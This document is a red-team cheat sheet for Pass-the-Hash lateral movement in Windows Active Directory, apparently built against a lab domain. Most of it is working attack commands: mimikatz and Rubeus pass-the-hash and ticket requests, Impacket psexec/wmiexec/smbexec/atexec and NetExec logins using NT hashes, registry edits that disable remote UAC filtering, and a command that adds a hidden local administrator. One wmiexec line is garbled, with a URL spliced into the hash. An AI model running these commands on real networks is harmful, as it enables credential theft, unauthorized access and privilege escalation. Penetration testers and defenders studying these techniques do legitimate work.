Pass The Hash

Resources

• Technology
  • By hackndo : https://en.hackndo.com/pass-the-hash/
  • Protected Users : https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group
• Offensive
  • By pentestlab : https://pentestlab.blog/2022/02/01/machine-accounts/
  • By n00py : https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/
  • By s3cur3th1ssh1t : https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/
  • By RastaMouse : https://offensivedefence.co.uk/posts/ntlm-auth-firefox/
  • By Harmj0y : https://specterops.io/blog/2017/03/16/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/
  • By Sensepost : https://sensepost.com/blog/2023/protected-users-you-thought-you-were-safe-uh/
  • By hackingarticles : https://www.hackingarticles.in/lateral-movement-pass-the-hash-attack/

Commands

• Recon
  • ActiveDirectory Module

    # Users with Hashes Types
    Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties SamAccountName, msDS-SupportedEncryptionTypes, ServicePrincipalName | Select-Object SamAccountName, @{Name="EncryptionTypes";Expression={if ($null -eq $_.'msDS-SupportedEncryptionTypes' -or $_.'msDS-SupportedEncryptionTypes' -eq 0) {"Default (Typically AES128/AES256)"} else { $types = @(); if ($_.'msDS-SupportedEncryptionTypes' -band 4) {$types += "RC4_HMAC_MD5"} if ($_.'msDS-SupportedEncryptionTypes' -band 8) {$types += "AES128_HMAC_SHA1"} if ($_.'msDS-SupportedEncryptionTypes' -band 16) {$types += "AES256_HMAC_SHA1"} $types -join ", "}}}, @{Name="HasSPN";Expression={if ($_.ServicePrincipalName) {"Yes"} else {"No"}}} | Format-Table -AutoSize

  • SMB shares

    smbclient -L //192.168.99.32 -U 'REDTEAMRECIPES\fmoheb%70acaa6bad1c4d34405f748f3fa4a9d1' --pw-nt-hash
    
    smbclient \\\\192.168.99.32\\ShareMe -U 'REDTEAMRECIPES\fmoheb%70acaa6bad1c4d34405f748f3fa4a9d1' --pw-nt-hash
    
    impacket-smbclient redteamrecipes.com/fmoheb@192.168.99.32 -hashes :70acaa6bad1c4d34405f748f3fa4a9d1
    

• Exploit
  • UAC
    • Demo

      nxc smb 192.168.99.32 -u fmoheb -p 'Password123#f' -x 'net user LabAdmin Password123! /add && net localgroup Administrators LabAdmin /add'
       
      nxc smb 192.168.99.32 -u LabAdmin -p 'Password123!' --local-auth -x 'whoami' # Will not work 
       
       nxc smb 192.168.99.32 -u fmoheb -p 'Password123#f' -x 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f'
       
      nxc smb 192.168.99.32 -u LabAdmin -p 'Password123!' --local-auth -x 'whoami' # Now it will
       
      nxc smb 192.168.99.32 -u fady -p '123' --local-auth -x 'whoami'
       
      nxc smb 192.168.99.32 -u fmoheb -p 'Password123#f' -x 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /d 1 /f'
       
      nxc smb 192.168.99.32 -u fady -p '123' --local-auth -x 'whoami'

    • Check
      • Powershell

        $Path = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
        $Reg = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
         
        [PSCustomObject]@{
            LocalAccountTokenFilterPolicy = if ($null -ne $Reg.LocalAccountTokenFilterPolicy) { $Reg.LocalAccountTokenFilterPolicy } else { "0 (Default/Missing)" }
            FilterAdministratorToken      = if ($null -ne $Reg.FilterAdministratorToken) { $Reg.FilterAdministratorToken } else { "0 (Default/Missing)" }
        } | Format-List

      • cmd

        reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy
        reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken

      • CleanUP

        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /f
         
        Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Force

  • mimikatz

    mimikatz # sekurlsa::pth /user:robert.baratheon /ntlm:9029CF007326107EB1C519C84EA60DBE /domain:sevenkingdoms.local /run:powershell.exe

  • Rubues

    Rubeus.exe asktgt /domain:north.sevenkingdoms.local /user:robb.stark /aes256:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a /ptt /opsec /nowrap /outfile:C:\Users\arya.stark\Desktop\robbticket.kirbi

  • nxc
    • smb

      nxc smb 192.168.99.25 -u fmoheb -H aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1

    • winrm

      nxc winrm 192.168.99.10 -u fmoheb -H aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1

    • ldap

      nxc ldap 192.168.99.30 -u fmoheb -H 70acaa6bad1c4d34405f748f3fa4a9d1 -M whoami

  • Impacket
    • Psexec

      python3 psexec.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10 -service-name browser.exe -remote-binary-name edge.exe

    • Wmiexec

      impacket-wmiexec 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6badhttps://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10 -shell-type cmd
      

    • smbexec

      python3 smbexec.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10 -service-name edge.exe [-mode SERVER]

    • smbclient

      python3 smbclient.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10

    • atexec

      python3 atexec.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' ipconfig

    • TicketConverter

      base64 -d robbticket.b64 > robbticket.kirbi
      impacket-ticketConverter robbticket.kirbi robbticket.ccache
      export KRB5CCNAME=$(pwd)/robbticket.ccache
       
      impacket-wmiexec -k -no-pass north.sevenkingdoms.local/robb.stark@winterfell.north.sevenkingdoms.local # Don't use the IP use the fqdn

  • NamedPipePTH

    # It's only working locally not netwrok login
     
    Invoke-ImpersonateUser-PTH -Target localhost -domain redteamrecipes.com -Username zazima -Hash c8bb6a952612aa72bb9432a999702f41 -PipeName pth -binary cmd.exe -Verbose
     
    .\SharpNamedPipePTH.exe username:zazima domain:redteamrecieps.com hash:c8bb6a952612aa72bb9432a999702f41 pipename:pth binary:cmd.exe # Doesn't work on my env 

Tools

• impacket : https://github.com/fortra/impacket
• nxc : https://github.com/Pennyw0rth/NetExec
• mimikatz : https://github.com/gentilkiwi/mimikatz
• lsassy : https://github.com/login-securite/lsassy
• pth-toolkit : https://github.com/byt3bl33d3r/pth-toolkit
• NamedPipePTH : https://github.com/S3cur3Th1sSh1t/NamedPipePTH/ || https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH

Notes

UAC

• Domain Accounts bypass Remote UAC automatically ( natif = built-in )
• If you install a brand new copy of Windows and query the registry, you will not find LocalAccountTokenFilterPolicy or FilterAdministratorToken Because they do not exist, Windows defaults to a value of 0 for both.

Protected Users Group

• The restriction of the Protected Users group is not complete when it comes to the RID500 user of the Active Directory domain. We cannot connect using the NTLM authentication protocol but we can connect using the Kerberos authentication protocol with RC4.

Nodes

• LSASS
• SAM, System,LSA and Security
• Pass The Ticket